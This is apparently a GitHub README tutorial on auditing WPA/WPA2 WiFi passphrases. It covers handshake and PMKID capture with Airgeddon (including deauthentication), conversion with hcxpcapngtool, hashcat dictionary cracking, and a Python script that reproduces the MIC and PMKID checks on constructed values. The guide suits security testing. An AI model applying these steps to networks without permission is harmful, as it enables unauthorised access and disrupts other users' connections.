README.md

File metadata and controls

96 lines (71 loc) · 4.95 KB

Pentesting-Wifi-Security: A Step-by-Step Guide


Introduction

A WPA/WPA2-PSK network is only as strong as its passphrase: the four-way handshake between a client and the access point can be captured over the air, and the pre-shared key can then be attacked offline by testing candidate passphrases against it. Testing your own networks this way tells you whether the passphrase would survive a dictionary attack. This guide walks through using Parrot OS, Airgeddon, hcxtools and Hashcat to capture a WPA/WPA2 handshake (or a PMKID) and attempt to recover the network passphrase from it. Note that nothing is "decrypted" in this process; the captured handshake is used to verify passphrase guesses.

Step 1: Download and Install Parrot OS

  1. Download Parrot OS Linux Distro: Start by downloading the Parrot OS from Parrot Security.
  2. Download Balena Etcher: To create a bootable USB flash drive, download Balena Etcher from Balena Etcher.
  3. Burn the Image: Use Balena Etcher to burn the Parrot OS image to your USB flash drive.
  4. Boot from USB: Insert the USB flash drive into your computer and boot from it.

Step 2: Setting Up Parrot OS

  1. After booting into Parrot OS, click on "Applications" in the top left corner.
  2. Navigate to Pentesting -> Wifi Pentesting -> Airgeddon.

Step 3: Capturing the WiFi Network Handshake

What is a Handshake?

When a client joins a WPA/WPA2-PSK network, it and the access point run the EAPOL four-way handshake: both sides derive the Pairwise Master Key (PMK) from the passphrase and the SSID, exchange random nonces, derive session keys from the PMK and the nonces, and prove to each other that they hold the PMK by attaching a message integrity code (MIC) to the handshake messages. The passphrase itself is never sent, so the capture cannot be "decrypted"; what it gives an attacker is everything needed to check passphrase guesses offline: the SSID, both MAC addresses, both nonces and a MIC to compare against. A pair of consecutive messages (1 and 2, or 2 and 3) is enough; a complete four-message exchange is not required.

Steps to Capture the Handshake

  1. Select Your WiFi Card: In Airgeddon, first select your WiFi card.
  2. Enable Monitor Mode: Choose option 2 to put your WiFi card into monitor mode. In monitor mode the card passes raw 802.11 frames (including management frames and the EAPOL handshake) from every network on the current channel to the capture tool, without having to associate with any of them. Not every adapter or driver supports this; if the option fails, check that your card supports monitor mode and packet injection.
  3. Navigate to Handshake/PMKID Tools: Select option 5.
  4. Explore WiFi Networks: Choose option 4 to scan for nearby WiFi networks.
    • A window will pop up displaying available networks.
    • Stop the scan by pressing Ctrl + C.
  5. Select Desired Network: Choose the network you want to test.
  6. Capture Handshake: Select option 6.
    • You will be given three methods to obtain the handshake:
      1. Deauthentication attack: forged deauthentication frames disconnect a connected client, and the handshake is captured when it reconnects. This is fast but noisy, and it does not work against clients and access points that enforce 802.11w Protected Management Frames, which authenticate deauthentication frames.
      2. PMKID capture: request the PMKID from the access point without any client present. The PMKID is derived from the PMK, so it can be attacked offline the same way as a handshake, but only on WPA/WPA2-PSK networks, where the PMK comes directly from the passphrase. On WPA3-SAE the PMK is the output of the SAE exchange, so a captured PMKID does not allow offline passphrase guessing.
      3. Passive capture: wait for a client to connect on its own. Slowest, but generates no traffic of yours.
    • After a successful capture, you will obtain a .cap file containing the handshake or PMKID. A capture with no usable EAPOL message pair or PMKID will produce nothing in the next step, so if the conversion reports zero hashes, capture again.

Step 4: Converting the Handshake File Offline

Hashcat's current WPA mode (22000) takes the hc22000 text format rather than a raw capture, so the .cap file has to be converted first. Instead of uploading the capture to an online converter, convert it offline with hcxtools, which Parrot OS includes.

  1. Convert .cap to .hc22000 offline: Use hcxpcapngtool from hcxtools to convert the .cap file:
    hcxpcapngtool -o output.hc22000 input.cap
    • Replace output.hc22000 with your desired output file name.
    • Replace input.cap with the name of your captured handshake file.
    • The tool prints a summary of what it found. Check the counts of EAPOL pairs and PMKIDs written to the hash file; if both are zero, the capture did not contain a usable handshake and no output file worth cracking was produced.
    • One .hc22000 file can contain both PMKID lines (WPA*01) and EAPOL lines (WPA*02); hashcat handles both in mode 22000.

Step 5: Cracking the Handshake with Hashcat

  1. Open a New Bash Shell: In Parrot OS, open a terminal.

  2. Run Hashcat: Use the following command to start a dictionary attack against the .hc22000 file:

    hashcat -m 22000 <your_.hc22000_file> <wordlist>
    • Replace <your_.hc22000_file> with the path to your converted handshake file.
    • Replace <wordlist> with the path to your wordlist file. Parrot OS includes wordlists in /usr/share/wordlists (on some distributions rockyou.txt ships compressed and must be extracted first).
    • Each candidate costs 4096 PBKDF2-HMAC-SHA1 iterations, so this is slow on a CPU; a GPU helps a lot, and a long random passphrase will not fall to any wordlist.
    • Recovered passphrases are stored in hashcat's potfile; print them again with hashcat -m 22000 <your_.hc22000_file> --show.

    For example:

    hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt
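To make concrete what the handshake paragraph in Step 3 describes and what hashcat does with each wordlist entry in Step 5, here is an added example (written for this guide, not code from the original page, Airgeddon or hashcat) that implements the WPA2-PSK check by hand: PMK from passphrase and SSID via PBKDF2-HMAC-SHA1, the 802.11i pairwise key expansion, the EAPOL MIC over message 2, and the PMKID derivation. The SSID, MAC addresses, nonces and passphrase are constructed sample values, not a real capture; the script builds its own EAPOL message 2 with the correct MIC, then "cracks" it from a small constructed wordlist.

```python
"""What hashcat -m 22000 verifies for each candidate passphrase (added example,
not the guide's own code). All network parameters below are constructed."""
import hashlib
import hmac

# --- Constructed sample "capture" (assumed values, not from a real network) ---
SSID = b"TestNet"
AP_MAC = bytes.fromhex("001122334455")     # AA: authenticator (access point) address
STA_MAC = bytes.fromhex("66778899aabb")    # SPA: supplicant (client) address
ANONCE = bytes(range(32))                  # real nonces are random; fixed here for reproducibility
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "password123"
WORDLIST = ["letmein", "qwerty", "password123", "hunter2"]   # constructed wordlist

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type, key info, key length, replay ctr,
                  # nonce, IV, RSC, ID (77) = byte offset of the 16-byte MIC field


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step that dominates cracking speed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]   # KCK = PTK[0:16] is the only part needed to check the MIC


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16],
    computed over the whole EAPOL-Key frame with the MIC field set to zero.
    (WPA/TKIP, descriptor version 1, uses HMAC-MD5 instead.)"""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk: bytes, aa: bytes, spa: bytes) -> bytes:
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AA || SPA)[:16]; what the clientless attack captures."""
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (WPA2, no key data). Constructed layout, field widths per 802.11i."""
    key_info = b"\x01\x0a"              # MIC bit set, pairwise, descriptor version 2 (HMAC-SHA1)
    body = (b"\x02"                     # descriptor type: RSN
            + key_info
            + b"\x00\x00"               # key length (0 in message 2)
            + b"\x00" * 7 + b"\x01"     # replay counter = 1
            + snonce + bytes(16) + bytes(8) + bytes(8)   # SNonce, key IV, RSC, key ID
            + mic
            + b"\x00\x00")              # key data length = 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type Key


def make_sample_capture(passphrase: str = TRUE_PASSPHRASE):
    """Play the role of the access point and client: produce message 2 with a valid MIC, plus the PMKID."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_eapol_msg2(SNONCE))
    return build_eapol_msg2(SNONCE, mic), pmkid(pmk, AP_MAC, STA_MAC)


def crack_handshake(eapol_frame, ssid, aa, spa, anonce, snonce, wordlist):
    """The WPA*02 check: recompute the MIC for each candidate and compare with the captured one."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


def crack_pmkid(captured_pmkid, ssid, aa, spa, wordlist):
    """The WPA*01 check: no nonces or EAPOL frame needed, only SSID and the two MACs."""
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), aa, spa), captured_pmkid):
            return candidate
    return None


if __name__ == "__main__":
    frame, pid = make_sample_capture()
    print("handshake ->", crack_handshake(frame, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, WORDLIST))
    print("pmkid     ->", crack_pmkid(pid, SSID, AP_MAC, STA_MAC, WORDLIST))
```

The PMK derivation can be checked against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE" gives PMK f42c6fc5...a12e). Everything after the PBKDF2 step is cheap, which is why the attack scales with wordlist size and GPU count rather than with anything the network operator controls, apart from the passphrase itself.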

Additional Resources

For more options and detailed usage of Hashcat, refer to the help command:

hashcat --help

Conclusion

By following these steps, you can capture WPA/WPA2 handshakes or PMKIDs and attempt to recover the pre-shared key from them, which tells you whether your own network's passphrase would withstand a dictionary attack. If it falls to a wordlist, change it to a long, random passphrase, or move to WPA3-SAE where your equipment supports it. Always ensure you have permission to test any network you do not own; deauthentication in particular disrupts other people's connections. This process is strictly for educational and security testing purposes.